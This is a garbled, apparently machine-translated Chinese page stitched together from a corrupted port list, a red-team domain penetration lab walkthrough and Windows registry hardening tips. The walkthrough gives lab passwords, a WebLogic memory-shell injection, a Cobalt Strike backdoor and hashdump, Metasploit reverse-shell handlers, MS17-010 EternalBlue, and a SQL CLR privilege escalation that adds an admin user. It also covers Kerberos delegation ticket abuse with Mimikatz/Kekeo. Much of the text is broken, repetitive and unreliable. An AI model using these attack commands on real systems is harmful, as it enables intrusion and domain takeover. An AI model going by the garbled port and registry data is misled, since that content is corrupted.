16028端口用途详解
16028是个什么端口
天山雪狐信息安全团队https://xjhack.x.sfbbs.net/公共portlisted端口1服务协议服务协议服务端口控制2UTSNET管理3压缩过程5远程登录7 ECHO 7 ECHO(ECHO)9 drop 11在线用户12个在线用户12个测试端口12 I 13时间15 NETSTAT 17每日摘录18消息发货协议19个字符20文件传输协议(默认数据端口)21文件传输协议(控制)远程登录协议个人邮件25SMTP货运协议短邮件27用户系统现场按摩29msgicp31msg确认33显示支持协议35保留用于个人打印服务37时间38位置访问协议38图形路由协议42胜利主机名称服务43“昵称” WHOIS服务44 MPM(消息处理模块)标志协议45处理模块46消息处理模块(默认交付端口) 47 NIFTTP 48数字音频背景服务49 TACACS登录主机协议50远程邮件评论协议XEROX Network 53域名服务器54 Xerox Clearinghouse网络网络服务55 Graphic语言56 Xerox网络服务系统确认57受保护的个人终端访问58邮件Xerox网络访问58个人文件服务60未定义的61ni邮件? 62异步通信适配器服务63 WHOIS+64通信接口65TACACS数据库服务66oraclesql*net67 bootstrap协议服务器68 Bootstrap协议服务器68 Bootstrap协议客户69小文件传输协议70协议搜索74远程工作搜索信息74远程工作协议76设计用于个人远程工作对象77 78 CP79FINGER(在线用户问题远程主机和其他信息)80协议超文本全局信息网络(www)81主机2名称服务82送货实用程序83智能终端ML设备模块化84公共跟踪设备85 ML模块化智能端子86 MicroFocusCobol 87 MicroFocusCobol 87编程语言for Personal Terminal Connection 88 Kerberros Security Confirmation System 89 SU/MIT Terminal Emulation Gate 90 DNSIX Security Dnsix Fig. 95Procal Protocol Supdup96dixie 97Protokol Fast Virtual File 98Tac (University of Tokyo Automatic Computer) 99 Telnet Service, Open 99 Port (Tro.S.Rom1919999999999999999999999999 PITNP104CR- 8SNAGAS109POSTOFFICE110POP3服务器(邮箱输送服务器)111SUNRPC112MCIDAS113 IDEC114AUDIONEWS115SFTP16ANATP15SANATIFY118 PATHE18 PATHE18 GSS-XLICEN129PWDGEN130CISCO-FNA131CISCISCO-TNA132CISCO -YS133STATSRV135INGRES-NET1 DNS PROFILEPROFILENAMINGYSTEM137NETBIOS137NETBIOS 137NETBIOS DATAGRAM(UDP) 44News145UAAC1468ISOGONIP41487ISOGONIP41487 -CMP158PC MAIL159NSS - 路由160SGMP-TRAPS161远程管理(SNMP)162SNMP-TRAP163CMIP-MAN164CMIP-AGENT165XN S-COURIER SU-NMS193SRMP194IRC195DN6-NLM-AUD196DN6-SMMMMMMMMMMMMMMMMMMMMMMM-MMM-MMM-MMM-MMM-MMM-MMM-MMM-MMM-MMM-MMM-MMM-MMM-MMM-MMM-MMM-MMM-MMM-MMM-MMM-MMM-SONS T MP202AT-NBP203AT-3204AT-EHO205AT-5206AT-ZIS207AT-7208AT-8209QMTP210Z39。50ANSI211914C/ G212ANET214VMPWSCS215SOFTPCINSIGNIASS216CAILIC217DBASE218MPP219UARPS220IMAP3221Fln-spx222rsh-spx223cdc242direct243sur-meas244dayna245link246dsp3270247subntbcst_tftp24 8bhfhs256rap257set258yak-chat259esro-gen260openport263hdap264bgmp280http-mgmt309entrust time310bhmds312vslmp315load316decauth317zannet321pip344pdap345pawserv346zserv347fatser v348csi-sgwp349mftp351matip-type-b351matip-type-b353ndsauth354bh611357bhevent362srssend 365dtk366odmr368qbikgdp371clearcase372ulistprocListProcessor373legent-1374legent-2374legent-2375hassle376nip377tnETOS378dsETOS379is99c380 is39p380is38php4arns385ibm-app386asa387aurp388unidata-ldm389ldap390uis391sinotics-relay393dis394embl-ndt395netcp396netware-ip397mptn398kry ptolan399iso-tsap-c2400vmnet0401ups不间断电源402genieGenieProtocol403decap404nced405ncld406imsp407timbuktu40 8prm-sm409prm-nm410declarebugDECLadebugRemoteDebugProtocol411rmt412synoptics-trap413smspSMSP414infoseek415bnet416silverplat ter417onmux418hyper-g419ariel1420smpte421ariel2422ariel3423opc-作业-start424opc-作业-track425icad-el426smartsdp427svrloc428ocs _cmu429ocs_amu430utmpsd431utmpcd432iasd433nnsp434mobileip-agent435mobilip-mn436dna-cml437comscm438dsfgw439dasp440sgcp441dec vms-sysmgt442cvc_hostd443 安全服务 444snpp445NT 新共享端口资源。
(139) 446ddm-rdb447ddm-dfm448ddm-ssl449as-servermap450tserver451sfs-smp-net4 53creativeserver454contentserver455creativepartnr456Hackers457scohelp458appleqtc459ampr-rcmd460skronk461datasurfsrv462datasu rfsrvsec463alpes464kpasswd465smtps466digital-vrc467mylex-mapd468phuris469rcp470scx-proxy471mondex472ljk-login473hybrid-pop 474tn-tl-w1475tcpnethaspsrv476tn-tl-fd1477ss7ns478spsc479iafserver480iafdbase481phPh482bgs-nsi483ulpnet484integra-sme485pow erburstAirSoftPowerBurst486avian487saft488gss-http489nest-protocol490micom-pfs491go-login492ticf-1493ticf-2494pov-ray495inte 快递496pim-rp-disc497dantz498siam499iso-ill500sytek501stmf502asa-appl-proto503intrinsa504citadel505mailbox-lm506ohimsrv50 7crs508xvttp509snare510fcp511passgo512exec513login514shell515printer516videotex517talk518ntalk519utime520efs521ripng522ulp52 3ibm-db2524ncpNCP525timed526temponewdate527stx528custix529irc-serv530courier531conferencechat532netnews533netwall534mm-admi n535iiop536opalis-rdv537nmsp538gdomap539apertus-ldp540uucp541uucp-rlogin542commerce543klogin544kshell545appleqtcsrvr546dhcpv 6-client547dhcpv6-server548afpovertcp549idfp550new-rwho551cybercash552deviceshare553pirp554rtsp555dsf556remotefs557openvms-s ysipc558sdnskmp559teedtap560rmonitor561monitor562chshellchcmd563nntps5649pfs565whoami566streettalk567banyan-rpc568ms-shuttle 569ms-罗马570meter571meter572声纳573榕树-vip574ftp-agent575vemmi576ipcd577vnas578ipdd579decbsrv581bdp588cal589eyelink590 tns-cml593http-rpc-epmap594tpip596smsd599acpAeolonCoreProtocol600ipcserverSunIPCserver606urmCray607nqs608sift-uft609npmp-tra p610npmp-local611npmp-gui613hmmp-op620sco-websrvrmgr621escp-ip625dec_dlm626asia628qmqp630rda631ipp632bmpp634ginad635rlzdbas e636ldaps637lanserver639msdp666doom667disclose668mecomm669meregister670vacdsm-sws671vacdsm-app672vpps-qua673cimplex674acap67 5dctp704elcsd705agentx709entrust-kmsh710entrust-ash729netviewdm1730netviewdm2731netviewdm3741netgw742netrcs744flexlm747fuji tsu-dev748ris-cm749kerberos-adm750rfile751pump752qrh753rr754tellsend758nlogin759con760ns761rxe762quotad763cycleserv764omser v765webster769vid770cadlock771rtip772cycleserv2773submit774rpasswd776wpages780wpgs786koncertConcert787qscQSC801device873rsyn crsync886iclcnet-locate887iclcnet_svinfo888erlogin900omginitialrefs911xact-backup990ftps991nas992telnets993imaps994ircs995po p3s996vsinet997maitrd998busboy999garcon1000cadlock1010surf1023Reserved1024NetSpy.698(YAI)1025networkblackjack1026Win2000信息服务中 ternet1031iad21032iad31033Netspy1042Bla1.11047GateCrasher1080Wingate1058nim1059nimreg1067instl_boots1068instl_bootc1080W 记住1083ansoft-lm-11084ansoft-lm-21109kpop1114SQL1123murrayMurray1155nfa接入网络1212忘记1222nervSNIR&Dnetwork 1239nmsdNMSD1243Sub-7Trojan1245Vodoo1248hermes1269Maverick sMatrix1492FTP99CMP(BackOriffice.FTP)1509StreamingServer1524ingresloc k backdoor1313bmc_patroldb1314pdps1321pipPIP1345vpjpVPJP1346alta-ana-lm1347bbn-mmc1348bbn-mmx1349sbookRegistrationNetworkProtocol1 350editbench1352lotusnote1353relief1354otak kanan1355intuitif-tepi1356cuillamartin1357pegboard1358connlcli1359ftsrv1360mime r1361linx1362timeflies1363ndm-requester1364ndm-server1365adapt-sna1366netware-csp1367dcs1368screencast1369gv-us1370us-gv1371 fc-cli1372fc-ser1373chromagrafx1374mollyEPISSoftwareSystems1375bytex1376ibm-pps1377cichlid1378elan1379dbreporterIntegritySolutions1380telesis-licman1381apple-licman1382udt_os1383gwha1384os-licman1385atex_elmd1386checksum1387cadsi-lm1388objektif -DBC1 389ICLPV-DM1390ICLPV-SC1391ICLPV-SAS1392ICLPV-PM1393ICLPV-NLS1394ICLPV-NLC1395ICLPV-WSM1396DVL-Activemail1399Cadkey-Licman140 -NM-NP1404IGI-LM1405IBM -S1406NETLABS-LM1407DBSA-LM1408SOPHIA-LM1409HERE-LM1410HIQ1411AFAU DIOFILE1412INNOSYS1413INNOSYS-ACL1414IBM-MQSERIES1415DBSTAR1416NOVEL- LU6.21417BUKUKTU-SRV11418BUKUKTU-SRV21419BUKUKTU -SRV 31420BUKUKTU-SRV41421GANDALF-LM1422Autodesk-LM1423ESSBASE1424HYBRID1425Zion-LM1426SAIS1427MloadD1428Informatic-LM1429NMS 1430TPDUHYPERCOMTPDU1431RGTP1432BLUEBERRY-LM1433MS-SQL-S1434MS-SQL-M1435IBM-CICS1436SAISM1437TABULA1438EICON-SERVER143 9EICON-X251440EICON-SLP1441Cadis-11442Cadis-21 M1444MARCAM-LM1445PROXA-LM1446ORA -lm1447apri-lm1448oc-lm1449peport145 0dwf1451infoman1452GTEGSC- LM1453Genie-LM1454Intererhdl_elMD1455SL-LM1456DCA1457Valisys-LM1458NRCABQ-LM1459PROSHARE11460PROSHAR 1461IBM_wrly_LAN1462World-LM1463NUCLEUS1464MSL_LMD1465PIPES1466Oct-LM1467CSDMBASE1468CSDM1469AAL-LM1470AIAICT1471CS DMBASE1472CSDM1473OpenMatH1474TELEF INDER1475TALIGENT-LM1476CLVM-CFG1477MS-SNA-SERVER1478MS-SNA-BASE1479DEREGISTER1480PACERFO RUM1481AIRS1482MITEKSYS-LM1483AFS1484CONFluent1485Lansource1486NMS_ToPo InfosRVR1488Docstor1489dmdocbroker1490in situ-conf1491anynetgateway1492ftp99cmp (backoriffice.ftp) 1493netmap_lm1494ica1495cvc1496liberty- LM1497RFX-LM1498SYBASE-SQLANY1 499FHC1500VLSI -LM1501SAISCM1502Shivadiscovery1503IMTC-MCS1504EVB-ELM1505FUNKPROXY1506UTCD1507SYMPLEX1508DIAGMOND1509S L-L11512WINS1513FUJITSU-DTC1514FUJITSU-DTCNS1515IFOR-PROTOCOL1516VPAD1517VPAC1518VPVD1519VPVC1520ATM-ZIP -OFFICE1521NCUBE-LM1522RICardo- 5orasrv1526pdap-np1527tlisrv1528mciautoreg1529coauthor1530rap-ser vice1531rap-listen1532miroconnect1533virtual-places1534micromuse-lm1535empl-ins 3ds -LM1539Intell is this-lm1540rds1541rds21542gridgen-elmd1543simba-cs1544aspeclmd1545vistium-share1546abbaccuray1547laplink1548axon- lm1549S L-DB1552PCIARRAY1553SNA-CS1554CACI-LM15555LIVELAN1556AHWIN1557ARBORTEXT-LM1558XINGMPEG1559WEB2HOS T1560ASCI-VAL1561FACITYVIEW1562PCONNECTMGR1563CADABRA-LM1564 View1565WindDLB1566CorelVideo1567JLICELMD1568TSSPMAP156 9ets1570ORBIXD1571RB-DBS-DISP1572ChiComlicensEmanager1573itsComm-NS1574MVEL-LM1575oraclubaes1576MoldFlow-LM1577H ypercube-l m1578jacobuslicensemanager1579ioc- SEA-LM1580TN-TL-R1TN-TL-R11581MIL -2045-470011582MSIMS1583SimbaExpre ss1584TN-TL- FD21585IntV1 M1592COMMONSPACE1593MAINSOFT-LM1594SIXTRAK1595RADIO1596 RADIO-SM1597ORBPLUS-IIOP1598PICKNFS1599SIMBASVICES1600SHIV1601AAS1602INSPECT1603PICODBC1604ICABROWSERICABROWSER1605Slps Pupp ER1606SalutationManager1607STT1608SMARTCORP.LICENSEMANAGER1609ISYSG-LM1610TAURUS-WHOTE-GH1611111111111113Netbillkeyrepository1614Netbilcredentials1615NetbillaPhorization oductserver1617nimrodinter-agentcommunication1618skytelnet1619xs-opsorage1winport16fax16202fax162012fax1620fax 1624udp-sr-port1625svs-omagent1636cncp1637cnap1638cnip1639cert1640cert-responder1641invision1642isis-am1643isis-ambc1645datametry cs1646sa-msg-port1647rsaprsap1648并发-lm1649inspect1650nkd1651shiva_confsrvr1652xnmp1653alphatech-lm1654stargatealerts1 655dec-mbadmin1656dec-mbadmin-h1657富士通-mmpdc1658sixnetudr1659sg-lm1660skip-mc-gikreq1661netview-aix-11662netview-aix-2166 3netview-aix-31664netview-aix-41665netview-aix-51666netview-aix-61667netview-aix-71668netview-aix-81669netview-aix-91670netvi ew-aix-101671netview-aix-111672netview-aix-121673IntelProshareMulticast1674IntelProshareMulticast1675pdpPacificDataProduct16 76netcomm11677groupwise1678prolink1679darcorp-lm1681sd-elmd1682lanyon-lantern1683ncpm-hip1684snaresecure1685n2nremote1686cvmoNCVMON1687NSJTP-CTRL1688NSJTP-DATA1689Firefox1690NG-UMDS1691empi 重新EMPUMA1692SSTSYS-LM1694RRILWM1696RIFMM169999999999999999999999999999999 7RRISAT1698RSV-ENCAP-11699RSVP-ENCAP-21700MPS-RAFT1701L2F,L2TP1702 DESKSHR Lay1708gat-LMD1709Centra1710IMPERA1711PPTCONFERENCE1712Registrarresourcec 17FJ-HDNet171717171719H323Gatestat1720H323HOSTCALL1721722HKSLICENSESAGER1723PTP1725IDEN-RALP1726iber IAGAMES1727windDX1728telindus1729CityNLicouslyManagement1730Roketz17 31MSICCP1732Proxim1733SSSIPRALFOLARARARANMISSION1734CAmber1 735privateChat1736street-Stream1737ultimad1738gamegen11739webaccess1740encore1741CISCO-NET-MGMT1743CineMagraphicSlicaneSemana Ger1744ncpm-ft1745remote-winsock1746frapid-11747frapid -21748oracle-em11749aspen-services1750simplesocketlibrary'sportmaster1751swiftnet1752LeapfaithResemanager1753transl ogicensemanager1754 IENENENGER1760WWW-GW1761CFTFF-01762CFF T-11763CFT-2177770 73KMSControl1774Global-DTServ17776FEMIS17777PowerGuardian1779Pharmasoft1780dpkeysersoft- LM1782HP- HCIP1783FUJITSUREMOTEINSTALLLVICE1784FINLELICENSEMANAGER1785WIND
win7系统能玩cs吗
Win7系统可以玩CS() <) 这个多层网络域渗透项目旨在模拟红队攻击人员对权限下的目标进行渗透。
- 构造与限制、CVE-2020-1472、SQLServer的权限等。
文中如有不当之处,希望大家多多批评。
请注意:
本文仅用于技术讨论和研究。
我将使用 Kalilinux 作为攻击机来进行本次学习。
此处使用的技术仅用于学习和教育目的。
整个环境共有四台目标机,位于三层内网环境中。
DMZ 范围有两个网卡,一个用于在另一个网络之外创建服务,另一个用于连接第二个网络。
第二层网络的目标机也有两个网卡,一个连接第二层网络,一个连接到第三层网络
第三层网络环境的IP段为10.10.10.1/24第三层第三层的目标机器只有一张网卡连接 连接第三层网络,包括域控机和域服务器
由于网络环境问题,该段IP可能会有所不同从192.168.254改变。
目录恢复密码:Redteam!@#45
主机名:OWA
域管理员:管理员:
Qweasd123
Admin12345
服务器MSSQL:WindowsSserver2008+SQLServer2008(配置无约束)SQLServer-2008
本地管理员:管理员:admin12345
域帐号:Redteam\SQLServer: Server12345(已配置限制)
MSSQL: SA: SA
单台PC :Windows7主机名:Work-7
本地管理员:John:Admin!@#45
本地管理员:Administrator:admin12345
Weblogic:WebLogic123 Oracle\Middleware\oracle_home\user_projects\domains\base_domain
您需要该服务
其他服务打开。域用户:
域服务帐户:Redteam\SQLServer:Server12345(已配置的已配置设备计划)
邮件用户:Redteam\Mail:admin!@#45
添加域帐户:redteam\adduser: add12345
redteam \ saulgoodman: saul12345 配置非构造)
redteam \ Gu: gu12345
> 漏洞利用记录区域存在多个漏洞。
有 CVE-2020-1472
分享所有类型的漏洞
有 CVE-2019-1388 还有很多漏洞可以尝试。
目标IP为:192.168.254.112。
首先使用NMAP 创建目标的简单扫描。
目标开放端口7001有Weblogic服务。
用Weblogic-Gui注入,发现是管理员权限,直接注入内存马,ICE-Scorpion上线。
赢得 DMZ 区域中的机器以及为了提高权限和权限,横向渗透通常分为两个方面。
判断电脑是否为多网卡机器,然后扫描其他网段,尝试寻找更多有间隙的机器。
尝试收集机器内部敏感文件、账户密码本等敏感信息,快速突破防线。
由于设备的计算机已经具有管理员权限,因此可以轻松地继续收集信息。
首先检查进程中是否有杀毒软件:
tasklist/SVC
这里发现是双网卡我直接上网CS,上传exe后门。
上线后,我尝试捕获密码并保存哈希值。
密码哈希值:
hashdump
receivedpasswordhashes: Administrator:500: aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2 cad21734fe7:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
尝试访问在线解密平台
https:// www.cmd5.com/
获取管理员密码“Admin12345”。
检查是否在域内。
netconfigworkstation//验证计算机名以及全名和用户名、系统版本、工作站、域、登录域。
一般时间服务器为主域控制器
nettime/domain//显示域控制器的当前时间。
计算机不在域中。
由于它有两个网卡,因此使用fscan来扫描网段。
通过fscan上传到目录C:\windows\temp\
然后直接从CS插件运行fscan,
对于另一块网卡扫描部分C、计算机
扫描结果如下
这里我们可以通过这个靶场了解CS和MSF之间的联系。
当前情况下,主机在CS上在线。
在这里,我们将 CS 会话交换到 MSF。
首先在CS上创建一个监听器。
CS听众分为两类:beacon和foreign。
Beacon 是 CS 的内置监听器。
当我们在目标系统上执行payload时,会发回一个beacon shell给CS。
Foreign主要是为一些外部监听器提供的,例如,如果你想使用CS创建一个meterpre ter shell稍后,为了获得渗透,您应该使用外部侦听器。
Host指向启用了MSF的服务器,计算机
在MSF上运行以下命令:
useexploit/multi/handler//使用监听模块
setpayloadwindows/meterpre ter/reverse_http//这个payload必须与CS为http协议设置的payload匹配
setlhost0.0.0.0//就可以了,
setlport8888//该端口必须被CS监听。
服务器端口保持一致,因为CS后门是反弹端口8888。
然后运行
运行
然后在 CS 上运行 Spawn,
选择刚刚添加到 MSF 侦听器的派生会话。
然后可以看到msf已经收到shell了。
执行命令出现乱码,所以更改编码格式
chcp65001
进入Shell on MSF 会话 获取目标主机的远程命令行 shell 并使用 exit 退出当前 shell。
当进入控制台界面时想要返回,
背景:将仪表保留在背景中。
我们返回到仪表pre ter位置,然后首先将路由添加到
runget_local_subnetsrunautorautorautorautoraute s10.20.0/24Runautorout-p
然后使用MS17-010-Tool在MSF ES上。
中断会话并返回到控制台表面
background
searchms17-010use3strhost10.10.7run
ms17-010在10.10.20.7上可用
You can now use Exploit/Windows/SMB/MS17_010_eternalblue for attack, take the machine down
Searchms17-01use0Setpayloadows/X64/meter Preter/Bind_tcpsetlport11111STRHOSTS10.20.7Show option
Execute
运行
我在这里的第一次攻击失败了,win7 bluescreen,重试。
输入外壳输入终端
win7通过MS17-010 简要描述IDEA 首先将FRP上传到受控的计算机(WebLOGC服务所在的计算机)您有一个SOCKS5隧道。
Then use MSF MSFCONSOLESETGPROXISTSONDS5: 192.168.254.xxx: XXXX // Kali proxy-ip and port SetgreverseallowProxyTrueuseexploit/Windows/SMB/MS 17-010-EternalbluesetpayloadWindows/X64/ meter PRETER/BIND_TCPSETRHOST10.10.20.7RUN方法:Win7带有有效载荷到线上在线CS cs定义了Transit Lister Firm 然后生成后门,然后选择新的lister P> 将后门转到Kali,然后使用MSF中的命令下载到目标计算机Win7 High uploadbeacon.exe shell,并从 ShellBeacon.exe 在这里应注意,WebLogic Service所在的计算机没有关闭火灾保护。
方法2:MSF派生的接受性谈话在CS 中,这里CS应该准备监视器,新的Transit Monitoring MSF - 负载注入模块 首先查看会话的ID useexploit/windows/local/apead_injectssetsetpayloadwindwindows/meter pre ter/reverse_httpsetlhost10.10.20.20.20ssteessessessesseession3 MSS MSS MSS QL 回到MSF,加载密码。
使用adfind-tool 扫描#query配置的非构造:adfind.exe-h10.10.8-usaul-upadmin!@#45-b” dc = redteam, dc = red“ -f”(&(Sam coundype = 805306369).803:= 524288))“ cndistushishynamename#c c c c t询问使用未知用户配置的查询:adfind.exe-h10.10.8-usa! 45 -b“ dc = redteam,dc = red” -f“ 06368)(UserccountControl:1.2.840.113556.1.4.803:= 524288)“ Cndiningu Ishedname#45 -B” (&(samAccountype = 805306369)(MSD-AllowTodelegateto =*))” Cndistiheshednamemsds-alllowedTodelegateto#dfind.exe-h10.8-110.8-usaul-usaul-usaul-usaul-upadmin! DC =红色”,DC =红色。
sqlserver用户通过frp Windows设置代理链 80页,没有或使用Point Point / P> >尝试炸毁SQLServer密码
P>关闭防火墙
用户的帐户还查看域控制。
24-Runouts-P Mimikatz收到了域用户的密码,并试图找到限制和约会用户。
其他主机
“ Eto
当前权限为Nthority\NetworkService,为普通服务权限
您可以使用MSSQL中的CLR组件。
并权限执行
Sharpsqltools.exe10。
授权用户。
.10.18saSamasterclr_efspotato "netlocalgroupadratorsocean.com/add"
用户
Sharpsqlto ols.exe10.10.18Samasterclr_efspotato "Netuser"
下一个 MSF
配置代理 -proxychains,更改您在代理链中,更改 代理链,代理链的变化,代理链的变化,代理链的变化,代理链的变化,代理链的变化,代理链的变化,代理链的变化。
/etc/proxychains.conf 文件
然后通过代理启动 MSF
或者可以进入 MSF 模型
useeExploit/window/mssql_clr_yrr_yy,如上流程中,通过MSF下载CS马,
使用Sharpsqltools.exe运行CS马, 高权限用户获取SQLSERVER HOST。
这里是分配域控制的限制,有很多可能性,比如CVE-2020-1472
在线CS后,你会得到用户密码
实施限制是指派采取域控制。.Kirbikeke.ex e“TgT :: 询问/用户:SQLServer/域:redteam.red/密码:server12345/票证:管理员 /TGT:[email protected]_krbtgt ~ [email protected]/用户:管理员@redteam.red/service: ciffs/owa.redteam.red "
mimikatz 将 ST2 导入到当前 会议。
Mimikatz for ptt
mimikatzkerberos :: [email protected]@redteam.red_cifs ~ [email protected] 我们对约束权有了新的见解或理解,例如GPP和 SQLSERVER。
声明:本文仅供技术交流,请自觉遵守相关网络安全法律法规。
与文章作者无关。
>
NAT端口最大值是什么意思?
端口:通过计算机连接的逻辑接口是计算机的第一个障碍。必须使用它。
它已指定,不能指定可以指定哪个端口。
执行NAT时,外部端口的最大值为hkey_local_machine \ system \ curentControlset \ services \ services:\ tcpip时间:如果应用程序请求如果是请求,则系统如果是请求,则此参数控制的最大端口数是最接近的有效值,当将此参数设置为有效范围(5000)。
或使用NAT(5000或65534)时使用65534)。
建议将价值放置。
Windows2000系统下通过修改注册表加强安全
1) 设置保存时间
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpipParametersDefaultTTLREG_DWORD0-0xff(十进制0-255;描述值128
描述:指定默认生存时间(TTL)值实际上,上限是 IP 数据包在被丢弃之前允许通过的路由数。
2)防止ICMP重定向报文攻击
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet Services\Tcpip
\ParametersEnableICMPRedirect sREG_DWORD0x0(默认值0x1
说明:该参数控制Windows 2000是否更改其唤醒表以响应从网络设备发送到它的ICMP重定向消息
3) 禁用对 ICMP 路由器消息的响应
HKEY_LOCAL_MACHINE\CurrentControlSet Services\Tcpip \Parameters\Interfaces\interface
PerformRouterDiscoveryREG_DWORD0x0(默认值 0x2)
说明:“ICMP 触发公告”功能 可能会造成他人计算机网络连接异常、数据窃听、用于流量攻击的计算机等严重后果。
。
这个问题导致了现场网络中部分局域网出现大范围、长期的网络异常。
因此,建议路由器响应 ICMP 路由消息。
Win2000中的默认值为2,这意味着当DHCP发出路由器发现选项时启用它。
4) 防止syn Flood攻击:SYN攻击防护包括减少SYN-ACK重传次数以减少分配资源的保留时间 请注意,保护机制仅在超出 TcpMaxHalfOpen 和 TcpMaxOpenRetried 设置时起作用 /p>
\parametersAutoShareServer, REG_DWORD, 0x0
6) 禁用 ADMIN $ 默认共享
HKEY_LOCAL_MACHINE \SYSTEM\CurrentControlSet Service lanmanserver
\parametersAutoShareWks, REG_DWORD, 0x0
7) 限制 IPC$ 默认共享
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control
\LsarestrictonymousREG_DWORD0x0 默认
0x1 匿名用户不列出用户数 可以
0x2个匿名节点连接本地IPC$共享
注意:不推荐2。
否则,可能会导致你的某些服务无法启动,比如SQLServer
8) IGMP协议
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Se不支持。
rvices Tcpip
\ParametersIGMPLevelREG_DWORD0x0(默认值0x2
注意:记住这是Win9x下的一个bug,即可以使用IGMP。
对于其他人出现蓝屏,这个bug可以通过修改注册表来修复,虽然Win2000没有这个bug,但是IGMP不是必须的,所以还是可以去掉的。
您将能够看到路径条目。
9)设置arp缓存老化时间设置
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip
\ParametersAr pCacheLifeREG_DWORD0-0xFFFFFFFF(秒数,默认值 120 秒
ArpCacheMinReferencedLifeREG_DWORD0-0xFFFFFFFF (第二个数字,默认值DC)
注意:如果ArpCacheLife大于或等于ArpCacheMinReferencedLife,则每次向条目IP地址发送出站数据包时,引用或未引用的ARP缓存条目都会在ArpCacheMinReferencedLife秒内进入
10) 禁用死端口监控 技术
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip
\ParametersEnableDeadGWDetectREG_DWORD0x0(默认值ox1
注意:如果设置的端口较多,设备会自动产生后门,难以处理更多连接。
建议禁止deathPorta Morrow。
11)不支持主轴功能
\Value为默认值。
0x0 )
说明:设置该值为0x1是为了让Win2000具有主轴功能,这样会引起不必要的问题。
12) 做Nature时最大外部端口external port是多少
\tcpip >\parametermaxadserreg_dor d5000-65534(十进制)(默认值0x1388-a点(5 ))指令,带有系统中可用的用户的用户数。
一般情况下,配置的短期端口分配号是1024-5000号。
当参数设置为有效范围时,将使用最大值((5)或(65)834)。
就好像使用 Nat 的值一样。
13)更改Mac地址
HKEY_LOCAL_MACHINE\System\CurrentControllet为“网卡”目录,例如为{4d36e972, e325-11ce, bfc1-08002be10318}
在类别00000000001,0002中查找“Driversc”的键值 例如, “Driversc”的值为“Intel(R) 825559Fasttelandlanmotherd”并在右侧窗口新建一个值线程,名称为“netksaddress”,这就是你想要的Mac值的,因为它在Mac中“ ,即0044040404040/全部。